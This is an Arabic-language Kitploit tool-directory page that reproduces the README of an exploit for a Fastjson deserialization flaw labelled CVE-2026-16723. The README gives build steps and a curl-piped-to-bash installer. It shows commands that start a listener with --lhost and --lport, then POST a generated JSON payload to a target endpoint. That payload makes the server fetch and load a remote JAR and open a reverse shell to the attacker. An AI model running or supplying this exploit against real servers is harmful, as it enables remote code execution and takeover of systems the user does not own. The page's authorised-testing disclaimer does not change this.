Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-16723 — ثغرة أمنية حرجة تؤثر على إصدارات Fastjson من 1.2.68 إلى 1.2.83. | Kitploit
أدوات/GitHubGitHub/1xpwn/cve-2026-16723
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHub1xpwn/cve-2026-16723

CVE-2026-16723

ثغرة أمنية حرجة تؤثر على إصدارات Fastjson من 1.2.68 إلى 1.2.83.

عرض المستودع
2منذ 20 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2026-16723

تطبيق مستقل بلغة C++17 لثغرة CVE-2026-16723، وهي ثغرة حرجة تؤثر على إصدارات Fastjson من 1.2.68 – 1.2.83.

المتطلبات

  • لينكس (أو WSL على ويندوز)

  • مترجم متوافق مع C++17 (GCC 7+ أو Clang 5+)

  • CMake 3.10 أو أحدث

  • حزم النظام:

    • libzip-dev
    • zlib1g-dev

Debian / Ubuntu

root@kitploit:~
sudo apt update
sudo apt install -y build-essential cmake libzip-dev zlib1g-dev

التثبيت

التثبيت السريع (موصى به)

ثبّت كل شيء بأمر واحد:

root@kitploit:~
curl -sSL https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh | bash

أو قم بتنزيل المثبّت وتنفيذه يدويًا:

root@kitploit:~
wget https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh
chmod +x install.sh
./install.sh

سينفّذ سكربت التثبيت ما يلي:

  • تثبيت جميع حزم النظام المطلوبة.

  • تنزيل المكتبات المطلوبة ذات الرؤوس فقط (header-only):

    • nlohmann/json
    • cpp-httplib
  • بناء المشروع.

  • وضع الملف التنفيذي المُجمّع في الدليل الحالي باسم:

root@kitploit:~
./exploit

البناء اليدوي

إذا كنت قد استنسخت المستودع:

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-16723.git
cd CVE-2026-16723
./install.sh

أو قم بالبناء يدويًا:

root@kitploit:~
mkdir build
cd build

cmake ..
make -j$(nproc)

cp exploit ../

الاستخدام

شغّل الملف التنفيذي:

root@kitploit:~
./exploit --lhost <YOUR_IP> --lport <SHELL_PORT> [options]

مثال

root@kitploit:~
./exploit --lhost 192.168.1.100 --lport 4444 --http-port 8000

بعد التنفيذ، سيتم إنشاء الملفات التالية:

root@kitploit:~
x
body.json

سيبدأ خادم HTTP على المنفذ المكوّن (الافتراضي: 8000) وستنتظر الأداة اتصال قشرة عكسية (reverse shell) وارد.


إرسال الحمولة

أرسل ملف body.json المُولّد إلى نقطة النهاية المستهدفة:

root@kitploit:~
curl -X POST http://<TARGET_IP>:8080/api/products/search \
     -H "Content-Type: application/json" \
     --data-binary @body.json

إذا كان التطبيق يتوقع حقلًا مختلفًا في JSON، فحدده باستخدام خيار --field.


خيارات سطر الأوامر


ملفات الإخراج

الملفالوصف
xحمولة JAR مولّدة
body.jsonحمولة JSON لإرسالها إلى الهدف

ملاحظات

  • هذا المشروع مخصص فقط لاختبارات الأمان المصرح بها والأغراض التعليمية.
  • يُجبر هذا التنفيذ التطبيق المستهدف على تنزيل وتحميل JAR عن بُعد باستخدام بروتوكولي jar:http وjar:file.
  • يتم ترميز أمر القشرة العكسية باستخدام Base64 لتقليل مشاكل الهروب (escaping).

تابعني على تويتر (X)

  • MNM
تنزيل الأداة
الخيارالوصفالافتراضي
--lhostعنوان IP المحليمطلوب
--lportمنفذ استماع القشرة العكسية4444
--http-portمنفذ خادم HTTP8000
--firstأول واصف ملف للمحاولة3
--lastآخر واصف ملف للمحاولة30
--fieldاسم حقل JSONfacets
--outdirدليل الإخراج.
-h, --helpإظهار رسالة المساعدة—